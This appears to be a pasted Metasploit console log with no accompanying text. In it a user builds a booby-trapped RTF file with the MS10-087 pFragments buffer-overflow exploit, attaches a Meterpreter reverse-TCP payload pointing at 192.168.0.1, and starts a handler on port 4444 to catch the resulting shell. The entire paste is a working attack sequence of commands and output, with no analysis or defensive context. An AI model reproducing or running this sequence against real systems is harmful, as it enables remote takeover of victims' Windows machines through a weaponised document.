Advertisement
Guest User

Untitled

a guest
Jul 22nd, 2017
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.97 KB | None | 0 0
  1. msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
  2. msf exploit(ms10_087_rtf_pfragments_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
  3. PAYLOAD => windows/meterpreter/reverse_tcp
  4. msf exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.0.1
  5. LHOST => 192.168.0.1
  6. msf exploit(ms10_087_rtf_pfragments_bof) > exploit
  7.  
  8. [*] Creating 'msf.rtf' file ...
  9. [*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.rtf
  10. msf exploit(ms10_087_rtf_pfragments_bof) > use exploit/multi/handler
  11. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  12. PAYLOAD => windows/meterpreter/reverse_tcp
  13. msf exploit(handler) > set LHOST 192.168.0.1
  14. LHOST => 192.168.0.1
  15. msf exploit(handler) > set LHOST 4444
  16. LHOST => 4444
  17. msf exploit(handler) > set LPORT 4444
  18. LPORT => 4444
  19. msf exploit(handler) > set LHOST 192.168.0.1
  20. LHOST => 192.168.0.1
  21. msf exploit(handler) > exploit
  22.  
  23. [*] Started reverse handler on 192.168.0.1:4444
  24. [*] Starting the payload handler...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement